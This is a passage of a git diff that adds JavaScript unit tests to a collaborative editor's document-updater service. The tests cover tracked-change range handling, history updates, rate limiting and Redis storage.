=> { + this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }).to.throw('insertion does not match text in document') + }) + }) + + describe('with an update that collapses a range', function () { + beforeEach(function () { + this.updates = makeUpdates([{ d: 'one', p: 0, t: 'thread-id-1' }]) + this.ranges = { + comments: makeRanges([ + { + c: 'n', + p: 1, + t: 'thread-id-2', + }, + ]), + changes: [], + } + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return ranges_were_collapsed == true', function () { + expect(this.result.rangesWereCollapsed).to.equal(true) + }) + }) + + describe('with an update that deletes ranges', function () { + beforeEach(function () { + this.updates = makeUpdates([{ d: 'one two three four five', p: 0 }]) + this.ranges = { + comments: makeRanges([{ c: 'n', p: 1, t: 'thread-id-2' }]), + changes: makeRanges([{ i: 'hello', p: 1, t: 'thread-id-2' }]), + } + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should increment the range-delta histogram', function () { + this.Metrics.histogram.called.should.equal(true) + }) + + it('should return ranges_were_collapsed == true', function () { + expect(this.result.rangesWereCollapsed).to.equal(true) + }) + }) + + describe('with comment updates', function () { + beforeEach(function () { + this.updates = makeUpdates([ + { i: 'two ', p: 4 }, + { c: 'one', p: 0 }, + ]) + this.ranges = {} + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should not send comments to the history', function () { + expect(this.result.historyUpdates[0].op).to.deep.equal([ + { i: 'two ', p: 4 }, + ]) + }) + }) + + describe('with history ranges support', function () { + describe('inserts among tracked deletes', function () { + beforeEach(function () { + // original text is "on[1]e[22] [333](three) fo[4444]ur five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + changes: makeRanges([ + { d: '1', p: 2 }, + { d: '22', p: 3 }, + { d: '333', p: 4 }, + { i: 'three', p: 4 }, + { d: '4444', p: 12 }, + ]), + } + this.updates = makeUpdates([ + { i: 'zero ', p: 0 }, + { i: 'two ', p: 9, u: true }, + ]) + this.newDocLines = ['zero one two three four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should offset the hpos by the length of tracked deletes before the insert', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ i: 'zero ', p: 0 }], + // 'two' is added just before the "333" tracked delete + [{ i: 'two ', p: 9, u: true, hpos: 12 }], + ]) + }) + }) + + describe('tracked delete rejections', function () { + beforeEach(function () { + // original text is "one [two ]three four five" + // [] denotes tracked deletes + this.ranges = { + changes: makeRanges([{ d: 'two ', p: 4 }]), + } + this.updates = makeUpdates([{ i: 'tw', p: 4, u: true }]) + this.newDocLines = ['one twthree four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should mark the insert as a tracked delete rejection where appropriate', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ i: 'tw', p: 4, u: true, trackedDeleteRejection: true }], + ]) + }) + }) + + describe('tracked delete rejections with multiple tracked deletes at the same position', function () { + beforeEach(function () { + // original text is "one [two ][three ][four ]five" + // [] denotes tracked deletes + this.ranges = { + changes: makeRanges([ + { d: 'two ', p: 4 }, + { d: 'three ', p: 4 }, + { d: 'four ', p: 4 }, + ]), + } + this.updates = makeUpdates([{ i: 'three ', p: 4, u: true }]) + this.newDocLines = ['one three five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should insert the text at the right history position', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { + i: 'three ', + p: 4, + hpos: 8, + u: true, + trackedDeleteRejection: true, + }, + ], + ]) + }) + }) + + describe('deletes over tracked changes', function () { + beforeEach(function () { + // original text is "on[1]e [22](three) f[333]ou[4444]r [55555]five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + comments: [], + changes: makeRanges([ + { d: '1', p: 2 }, + { d: '22', p: 4 }, + { i: 'three', p: 4 }, + { d: '333', p: 11 }, + { d: '4444', p: 13 }, + { d: '55555', p: 15 }, + ]), + } + this.updates = makeUpdates([ + { d: 'four ', p: 10 }, + { d: 'three ', p: 4 }, + ]) + this.newDocLines = ['one five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should split and offset deletes appropriately', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + // the "four" delete has tracked deletes inside it, add splits + { + d: 'four ', + p: 10, + hpos: 13, + trackedChanges: [ + { type: 'delete', offset: 1, length: 3 }, + { type: 'delete', offset: 3, length: 4 }, + ], + }, + ], + + // the "three" delete is offset to the right by the two first tracked + // deletes + [ + { + d: 'three ', + p: 4, + hpos: 7, + trackedChanges: [{ type: 'insert', offset: 0, length: 5 }], + }, + ], + ]) + }) + }) + + describe('deletes that overlap tracked inserts', function () { + beforeEach(function () { + // original text is "(one) (three) (four) five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + comments: [], + changes: makeRanges([ + { i: 'one', p: 0 }, + { i: 'three', p: 4 }, + { i: 'four', p: 10 }, + ]), + } + this.updates = makeUpdates( + [ + { d: 'ne th', p: 1 }, + { d: 'ou', p: 6 }, + ], + { tc: 'tracked-change-id' } + ) + this.newDocLines = ['oree fr five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should split and offset deletes appropriately', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { + d: 'ne th', + p: 1, + trackedChanges: [ + { type: 'insert', offset: 0, length: 2 }, + { type: 'insert', offset: 3, length: 2 }, + ], + }, + ], + [ + { + d: 'ou', + p: 6, + hpos: 7, + trackedChanges: [{ type: 'insert', offset: 0, length: 2 }], + }, + ], + ]) + }) + }) + + describe('comments among tracked deletes', function () { + beforeEach(function () { + // original text is "on[1]e[22] [333](three) fo[4444]ur five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + changes: makeRanges([ + { d: '1', p: 2 }, + { d: '22', p: 3 }, + { d: '333', p: 4 }, + { i: 'three', p: 4 }, + { d: '4444', p: 12 }, + ]), + } + this.updates = makeUpdates([ + { c: 'three ', p: 4 }, + { c: 'four ', p: 10 }, + ]) + this.newDocLines = ['one three four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should offset the hpos by the length of tracked deletes before the insert', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ c: 'three ', p: 4, hpos: 10 }], + [{ c: 'four ', p: 10, hpos: 16, hlen: 9 }], + ]) + }) + }) + + describe('inserts inside comments', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([ + { c: 'three', p: 4, t: 'comment-id-1' }, + { c: 'ree four', p: 6, t: 'comment-id-2' }, + ]), + } + this.updates = makeUpdates([ + { i: '[before]', p: 4 }, + { i: '[inside]', p: 13 }, // 4 + 8 + 1 + { i: '[overlap]', p: 23 }, // 13 + 8 + 2 + { i: '[after]', p: 39 }, // 23 + 9 + 7 + ]) + this.newDocLines = [ + 'one [before]t[inside]hr[overlap]ee four[after] five', + ] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should add the proper commentIds properties to ops', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ i: '[before]', p: 4 }], + [{ i: '[inside]', p: 13, commentIds: ['comment-id-1'] }], + [ + { + i: '[overlap]', + p: 23, + commentIds: ['comment-id-1', 'comment-id-2'], + }, + ], + [{ i: '[after]', p: 39 }], + ]) + }) + }) + + describe('tracked delete that overlaps the start of a comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'ne thr', p: 1 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['oee four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should crop the beginning of the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { d: 'ne thr', p: 1 }, + { c: 'ee', p: 1, hpos: 7, t: 'comment-id-1' }, + ], + ]) + }) + }) + + describe('tracked delete that overlaps a whole comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'ne three f', p: 1 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['oour five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should crop the beginning of the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { d: 'ne three f', p: 1 }, + { c: '', p: 1, hpos: 11, t: 'comment-id-1' }, + ], + ]) + }) + }) + + describe('tracked delete that overlaps the end of a comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'ee f', p: 7 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['one throur five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should crop the end of the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { d: 'ee f', p: 7 }, + { c: 'thr', p: 4, t: 'comment-id-1' }, + ], + ]) + }) + }) + + describe('tracked delete that overlaps the inside of a comment', function () { + beforeEach(function () { + // original text is "one three four five" + this.ranges = { + comments: makeRanges([{ c: 'three', p: 4, t: 'comment-id-1' }]), + } + this.updates = makeUpdates([{ d: 'hre', p: 5 }], { + tc: 'tracking-id', + }) + this.newDocLines = ['one te four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should not crop the comment', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ d: 'hre', p: 5 }], + ]) + }) + }) + }) + }) + + describe('acceptChanges', function () { + beforeEach(function () { + this.RangesManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/ranges-tracker': (this.RangesTracker = + SandboxedModule.require('@overleaf/ranges-tracker')), + '@overleaf/metrics': {}, + }, + }) + + this.ranges = { + comments: [], + changes: makeRanges([ + { i: 'lorem', p: 0 }, + { i: 'ipsum', p: 10 }, + { i: 'dolor', p: 20 }, + { i: 'sit', p: 30 }, + { i: 'amet', p: 40 }, + ]), + } + this.lines = ['lorem xxx', 'ipsum yyy', 'dolor zzz', 'sit wwwww', 'amet'] + this.removeChangeIdsSpy = sinon.spy( + this.RangesTracker.prototype, + 'removeChangeIds' + ) + }) + + describe('successfully with a single change', function () { + beforeEach(function () { + this.change_ids = [this.ranges.changes[1].id] + this.result = this.RangesManager.acceptChanges( + this.project_id, + this.doc_id, + this.change_ids, + this.ranges, + this.lines + ) + }) + + it('should log the call with the correct number of changes', function () { + this.logger.debug + .calledWith('accepting 1 changes in ranges') + .should.equal(true) + }) + + it('should delegate the change removal to the ranges tracker', function () { + this.removeChangeIdsSpy.calledWith(this.change_ids).should.equal(true) + }) + + it('should remove the change', function () { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[1].id + ) + ).to.be.undefined + }) + + it('should return the original number of changes minus 1', function () { + this.result.changes.length.should.equal(this.ranges.changes.length - 1) + }) + + it('should not touch other changes', function () { + for (const i of [0, 2, 3, 4]) { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[i].id + ) + ).to.deep.equal(this.ranges.changes[i]) + } + }) + }) + + describe('successfully with multiple changes', function () { + beforeEach(function () { + this.change_ids = [ + this.ranges.changes[1].id, + this.ranges.changes[3].id, + this.ranges.changes[4].id, + ] + this.result = this.RangesManager.acceptChanges( + this.project_id, + this.doc_id, + this.change_ids, + this.ranges, + this.lines + ) + }) + + it('should log the call with the correct number of changes', function () { + this.logger.debug + .calledWith(`accepting ${this.change_ids.length} changes in ranges`) + .should.equal(true) + }) + + it('should delegate the change removal to the ranges tracker', function () { + this.removeChangeIdsSpy.calledWith(this.change_ids).should.equal(true) + }) + + it('should remove the changes', function () { + for (const i of [1, 3, 4]) { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[i].id + ) + ).to.be.undefined + } + }) + + it('should return the original number of changes minus the number of accepted changes', function () { + this.result.changes.length.should.equal(this.ranges.changes.length - 3) + }) + + it('should not touch other changes', function () { + for (const i of [0, 2]) { + expect( + this.result.changes.find( + change => change.id === this.ranges.changes[i].id + ) + ).to.deep.equal(this.ranges.changes[i]) + } + }) + }) + }) + + describe('getHistoryUpdatesForAcceptedChanges', function () { + beforeEach(function () { + this.clock = sinon.useFakeTimers() + this.RangesManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/ranges-tracker': (this.RangesTracker = + SandboxedModule.require('@overleaf/ranges-tracker')), + '@overleaf/metrics': {}, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + it('should create history updates for accepted track inserts', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { i: 'lorem', p: 0 }, + { i: 'ipsum', p: 15 }, + ]), + } + const lines = ['loremone two thipsumree four five'] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: ranges.changes.map(change => change.id), + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 33, + pathname: '', + ts: now, + }, + op: [ + { + r: 'lorem', + p: 0, + tracking: { type: 'none' }, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 33, + pathname: '', + ts: now, + }, + op: [ + { + r: 'ipsum', + p: 15, + tracking: { type: 'none' }, + }, + ], + }, + ]) + }) + + it('should create history updates for accepted track deletes', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { d: 'two', p: 4 }, + { d: 'three', p: 5 }, + ]), + } + const lines = ['one four five'] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: ranges.changes.map(change => change.id), + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 23, + pathname: '', + ts: now, + }, + op: [ + { + d: 'two', + p: 4, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 20, + pathname: '', + ts: now, + }, + op: [ + { + d: 'three', + p: 5, + }, + ], + }, + ]) + }) + + it('should create history updates with unaccepted deletes', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { d: 'two', p: 4 }, + { d: 'three', p: 5 }, + ]), + } + const lines = ['one four five'] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: [ranges.changes[1].id], + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 23, + pathname: '', + ts: now, + }, + op: [ + { + d: 'three', + p: 5, + hpos: 8, + }, + ], + }, + ]) + }) + + it('should create history updates with mixed track changes', function () { + // 'one two three four five' <-- text before changes + const ranges = { + comments: [], + changes: makeRanges([ + { d: 'two', p: 4 }, + { d: 'three', p: 5 }, + { i: 'xxx ', p: 6 }, + { d: 'five', p: 15 }, + ]), + } + const lines = ['one xxx four '] + + const now = Date.now() + + const result = this.RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId: this.doc_id, + acceptedChangeIds: [ + ranges.changes[0].id, + // ranges.changes[1].id - second delete is not accepted + ranges.changes[2].id, + ranges.changes[3].id, + ], + changes: ranges.changes, + pathname: '', + projectHistoryId: '', + lines, + }) + + expect(result).to.deep.equal([ + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 27, + pathname: '', + ts: now, + }, + op: [ + { + d: 'two', + p: 4, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 24, + pathname: '', + ts: now, + }, + op: [ + { + r: 'xxx ', + p: 6, + hpos: 11, + tracking: { type: 'none' }, + }, + ], + }, + { + doc: this.doc_id, + meta: { + user_id: TEST_USER_ID, + doc_length: 15, + history_doc_length: 24, + pathname: '', + ts: now, + }, + op: [ + { + d: 'five', + p: 15, + hpos: 20, + }, + ], + }, + ]) + }) + }) +}) + +function makeRanges(ops) { + let id = 1 + const changes = [] + let ts = Date.now() + for (const op of ops) { + changes.push({ + id: id.toString(), + op, + metadata: { user_id: TEST_USER_ID, ts: new Date(ts).toISOString() }, + }) + id += 1 + ts += 1000 // use a unique timestamp for each change + } + return changes +} + +function makeUpdates(ops, meta = {}) { + const updates = [] + for (const op of ops) { + updates.push({ + meta: { user_id: TEST_USER_ID, ...meta }, + op: [op], + }) + } + return updates +} diff --git a/services/document-updater/test/unit/js/RateLimitManager/RateLimitManager.js b/services/document-updater/test/unit/js/RateLimitManager/RateLimitManager.js new file mode 100644 index 0000000..09c4eba --- /dev/null +++ b/services/document-updater/test/unit/js/RateLimitManager/RateLimitManager.js @@ -0,0 +1,133 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/RateLimitManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('RateLimitManager', function () { + beforeEach(function () { + let Timer + this.RateLimitManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + gauge: sinon.stub(), + }), + }, + }) + this.callback = sinon.stub() + return (this.RateLimiter = new this.RateLimitManager(1)) + }) + + describe('for a single task', function () { + beforeEach(function () { + this.task = sinon.stub() + return this.RateLimiter.run(this.task, this.callback) + }) + + it('should execute the task in the background', function () { + return this.task.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should finish with a worker count of one', function () { + // because it's in the background + return expect(this.RateLimiter.ActiveWorkerCount).to.equal(1) + }) + }) + + describe('for multiple tasks', function () { + beforeEach(function (done) { + this.task = sinon.stub() + this.finalTask = sinon.stub() + const task = cb => { + this.task() + return setTimeout(cb, 100) + } + const finalTask = cb => { + this.finalTask() + return setTimeout(cb, 100) + } + this.RateLimiter.run(task, this.callback) + this.RateLimiter.run(task, this.callback) + this.RateLimiter.run(task, this.callback) + return this.RateLimiter.run(finalTask, err => { + this.callback(err) + return done() + }) + }) + + it('should execute the first three tasks', function () { + return this.task.calledThrice.should.equal(true) + }) + + it('should execute the final task', function () { + return this.finalTask.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should finish with worker count of zero', function () { + return expect(this.RateLimiter.ActiveWorkerCount).to.equal(0) + }) + }) + + return describe('for a mixture of long-running tasks', function () { + beforeEach(function (done) { + this.task = sinon.stub() + this.finalTask = sinon.stub() + const finalTask = cb => { + this.finalTask() + return setTimeout(cb, 100) + } + this.RateLimiter.run(this.task, this.callback) + this.RateLimiter.run(this.task, this.callback) + this.RateLimiter.run(this.task, this.callback) + return this.RateLimiter.run(finalTask, err => { + this.callback(err) + return done() + }) + }) + + it('should execute the first three tasks', function () { + return this.task.calledThrice.should.equal(true) + }) + + it('should execute the final task', function () { + return this.finalTask.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should finish with worker count of three', function () { + return expect(this.RateLimiter.ActiveWorkerCount).to.equal(3) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/RealTimeRedisManager/RealTimeRedisManagerTests.js b/services/document-updater/test/unit/js/RealTimeRedisManager/RealTimeRedisManagerTests.js new file mode 100644 index 0000000..d678c8d --- /dev/null +++ b/services/document-updater/test/unit/js/RealTimeRedisManager/RealTimeRedisManagerTests.js @@ -0,0 +1,167 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/RealTimeRedisManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') + +describe('RealTimeRedisManager', function () { + beforeEach(function () { + this.rclient = { + auth() {}, + exec: sinon.stub(), + } + this.rclient.multi = () => this.rclient + this.pubsubClient = { publish: sinon.stub() } + this.RealTimeRedisManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/redis-wrapper': { + createClient: config => + config.name === 'pubsub' ? this.pubsubClient : this.rclient, + }, + '@overleaf/settings': { + redis: { + documentupdater: (this.settings = { + key_schema: { + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + }, + }), + pubsub: { + name: 'pubsub', + }, + }, + }, + crypto: (this.crypto = { + randomBytes: sinon + .stub() + .withArgs(4) + .returns(Buffer.from([0x1, 0x2, 0x3, 0x4])), + }), + os: (this.os = { hostname: sinon.stub().returns('somehost') }), + './Metrics': (this.metrics = { + summary: sinon.stub(), + histogram: sinon.stub(), + }), + }, + }) + + this.doc_id = 'doc-id-123' + this.project_id = 'project-id-123' + return (this.callback = sinon.stub()) + }) + + describe('getPendingUpdatesForDoc', function () { + beforeEach(function () { + this.rclient.llen = sinon.stub() + this.rclient.lrange = sinon.stub() + return (this.rclient.ltrim = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.updates = [ + { op: [{ i: 'foo', p: 4 }] }, + { op: [{ i: 'foo', p: 4 }] }, + ] + this.jsonUpdates = this.updates.map(update => JSON.stringify(update)) + this.rclient.exec = sinon.stub().yields(null, [2, this.jsonUpdates]) + return this.RealTimeRedisManager.getPendingUpdatesForDoc( + this.doc_id, + this.callback + ) + }) + + it('should get the pending updates', function () { + return this.rclient.lrange + .calledWith(`PendingUpdates:${this.doc_id}`, 0, 7) + .should.equal(true) + }) + + it('should delete the pending updates', function () { + return this.rclient.ltrim + .calledWith(`PendingUpdates:${this.doc_id}`, 8, -1) + .should.equal(true) + }) + + return it('should call the callback with the updates', function () { + return this.callback.calledWith(null, this.updates).should.equal(true) + }) + }) + + return describe("when the JSON doesn't parse", function () { + beforeEach(function () { + this.jsonUpdates = [ + JSON.stringify({ op: [{ i: 'foo', p: 4 }] }), + 'broken json', + ] + this.rclient.exec = sinon.stub().yields(null, [2, this.jsonUpdates]) + return this.RealTimeRedisManager.getPendingUpdatesForDoc( + this.doc_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback + .calledWith(sinon.match.has('name', 'SyntaxError')) + .should.equal(true) + }) + }) + }) + + describe('getUpdatesLength', function () { + beforeEach(function () { + this.rclient.llen = sinon.stub().yields(null, (this.length = 3)) + return this.RealTimeRedisManager.getUpdatesLength( + this.doc_id, + this.callback + ) + }) + + it('should look up the length', function () { + return this.rclient.llen + .calledWith(`PendingUpdates:${this.doc_id}`) + .should.equal(true) + }) + + return it('should return the length', function () { + return this.callback.calledWith(null, this.length).should.equal(true) + }) + }) + + return describe('sendData', function () { + beforeEach(function () { + this.message_id = 'doc:somehost:01020304-0' + return this.RealTimeRedisManager.sendData({ op: 'thisop' }) + }) + + it('should send the op with a message id', function () { + return this.pubsubClient.publish + .calledWith( + 'applied-ops', + JSON.stringify({ op: 'thisop', _id: this.message_id }) + ) + .should.equal(true) + }) + + return it('should track the payload size', function () { + return this.metrics.summary + .calledWith( + 'redis.publish.applied-ops', + JSON.stringify({ op: 'thisop', _id: this.message_id }).length + ) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/RedisManager/RedisManagerTests.js b/services/document-updater/test/unit/js/RedisManager/RedisManagerTests.js new file mode 100644 index 0000000..125dd3d --- /dev/null +++ b/services/document-updater/test/unit/js/RedisManager/RedisManagerTests.js @@ -0,0 +1,1153 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') +const crypto = require('node:crypto') +const tk = require('timekeeper') + +const MODULE_PATH = '../../../../app/js/RedisManager.js' + +describe('RedisManager', function () { + beforeEach(function () { + this.multi = { exec: sinon.stub().yields() } + this.rclient = { multi: () => this.multi, srem: sinon.stub().yields() } + tk.freeze(new Date()) + this.RedisManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/settings': (this.settings = { + documentupdater: { logHashErrors: { write: true, read: true } }, + redis: { + documentupdater: { + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:${docId}` + }, + docLines({ doc_id: docId }) { + return `doclines:${docId}` + }, + docOps({ doc_id: docId }) { + return `DocOps:${docId}` + }, + docVersion({ doc_id: docId }) { + return `DocVersion:${docId}` + }, + docHash({ doc_id: docId }) { + return `DocHash:${docId}` + }, + projectKey({ doc_id: docId }) { + return `ProjectId:${docId}` + }, + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + docsInProject({ project_id: projectId }) { + return `DocsIn:${projectId}` + }, + ranges({ doc_id: docId }) { + return `Ranges:${docId}` + }, + pathname({ doc_id: docId }) { + return `Pathname:${docId}` + }, + projectHistoryId({ doc_id: docId }) { + return `ProjectHistoryId:${docId}` + }, + projectState({ project_id: projectId }) { + return `ProjectState:${projectId}` + }, + projectBlock({ project_id: projectId }) { + return `ProjectBlock:${projectId}` + }, + unflushedTime({ doc_id: docId }) { + return `UnflushedTime:${docId}` + }, + lastUpdatedBy({ doc_id: docId }) { + return `lastUpdatedBy:${docId}` + }, + lastUpdatedAt({ doc_id: docId }) { + return `lastUpdatedAt:${docId}` + }, + historyRangesSupport() { + return 'HistoryRangesSupport' + }, + resolvedCommentIds({ doc_id: docId }) { + return `ResolvedCommentIds:${docId}` + }, + }, + }, + }, + }), + '@overleaf/redis-wrapper': { + createClient: () => this.rclient, + }, + './Metrics': (this.metrics = { + inc: sinon.stub(), + summary: sinon.stub(), + Timer: class Timer { + constructor() { + this.start = new Date() + } + + done() { + const timeSpan = new Date() - this.start + return timeSpan + } + }, + }), + './Errors': Errors, + }, + }) + + this.docId = 'doc-id-123' + this.project_id = 'project-id-123' + this.projectHistoryId = '123' + this.historyRangesSupport = false + this.callback = sinon.stub() + }) + + afterEach(function () { + tk.reset() + }) + + describe('getDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three', 'これは'] // include some utf8 + this.jsonlines = JSON.stringify(this.lines) + this.version = 42 + this.hash = crypto + .createHash('sha1') + .update(this.jsonlines, 'utf8') + .digest('hex') + this.ranges = { comments: 'mock', entries: 'mock' } + this.resolvedCommentIds = ['comment-1'] + this.json_ranges = JSON.stringify(this.ranges) + this.unflushed_time = 12345 + this.pathname = '/a/b/c.tex' + this.rclient.mget = sinon + .stub() + .yields(null, [ + this.jsonlines, + this.version, + this.hash, + this.project_id, + this.json_ranges, + this.pathname, + this.projectHistoryId.toString(), + this.unflushed_time, + ]) + this.rclient.sismember = sinon.stub() + this.rclient.sismember + .withArgs('HistoryRangesSupport', this.docId) + .yields(null, 0) + this.rclient.smembers = sinon.stub() + this.rclient.smembers + .withArgs(`ResolvedCommentIds:${this.docId}`) + .yields(null, this.resolvedCommentIds) + }) + + describe('successfully', function () { + beforeEach(function () { + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should get all the details in one call to redis', function () { + this.rclient.mget + .calledWith( + `doclines:${this.docId}`, + `DocVersion:${this.docId}`, + `DocHash:${this.docId}`, + `ProjectId:${this.docId}`, + `Ranges:${this.docId}`, + `Pathname:${this.docId}`, + `ProjectHistoryId:${this.docId}`, + `UnflushedTime:${this.docId}`, + `lastUpdatedAt:${this.docId}`, + `lastUpdatedBy:${this.docId}` + ) + .should.equal(true) + }) + + it('should return the document', function () { + this.callback.should.have.been.calledWithExactly( + null, + this.lines, + this.version, + this.ranges, + this.pathname, + this.projectHistoryId, + 